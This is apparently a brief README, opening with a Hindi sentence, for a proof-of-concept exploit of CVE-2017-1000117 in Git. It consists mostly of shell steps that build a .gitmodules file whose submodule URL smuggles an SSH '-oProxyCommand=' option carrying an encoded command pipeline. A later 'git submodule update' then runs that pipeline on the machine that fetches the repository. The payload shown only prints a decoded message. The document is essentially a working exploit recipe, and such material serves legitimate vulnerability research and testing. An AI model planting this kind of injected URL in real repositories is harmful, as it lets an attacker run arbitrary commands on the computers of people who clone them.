
CVE-2017-1000117 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो दुर्भावनापूर्ण Git सबमॉड्यूल URL के माध्यम से SSH ProxyCommand इंजेक्शन का उपयोग करके रिमोट कोड निष्पादन प्रदर्शित करता है।
$ git clone --recursive [email protected]:ikmski/CVE-2017-1000117.git
$ cat message.txt | gzip | base64 > command
$ git submodule add [email protected]:ikmski/Hello-World.git subs/CVE-2017-1000117
$ cat << EOS > .gitmodules
[submodule "subs/CVE-2017-1000117"]
path = subs/CVE-2017-1000117
url = ssh://-oProxyCommand=cat command | base64 --decode | gzip -d >&2 /subs/CVE-2017-1000117
EOS
$ git submodule sync
$ git submodule update